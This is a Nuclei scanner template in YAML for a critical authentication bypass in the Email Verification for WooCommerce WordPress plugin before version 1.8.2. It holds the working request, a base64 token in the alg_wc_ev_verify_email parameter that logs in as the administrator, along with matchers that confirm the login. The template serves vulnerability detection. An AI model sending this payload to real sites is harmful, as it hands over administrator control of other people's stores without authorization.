nuclei-templates/http/vulnerabilities/wordpress/wp-woocommerce-email-verifi...

47 lines
1.5 KiB
YAML
Raw Normal View History

id: wp-woocommerce-email-verification
2022-03-26 11:15:50 +00:00
info:
name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
author: random_robbie,daffianfo
severity: critical
description: |
Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
reference:
- https://wpvulndb.com/vulnerabilities/10318
- https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-288
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: woocommerce,wp,wpscan,wordpress,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
matchers-condition: and
matchers:
2022-03-26 11:15:50 +00:00
- type: regex
2021-01-11 06:44:22 +00:00
part: header
2022-03-26 11:15:50 +00:00
regex:
- "wordpress_logged_in_[a-z0-9]{32}"
2021-01-11 06:44:22 +00:00
- type: word
part: body
words:
- "Your account has been activated!"
- "From your account dashboard you can view your"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950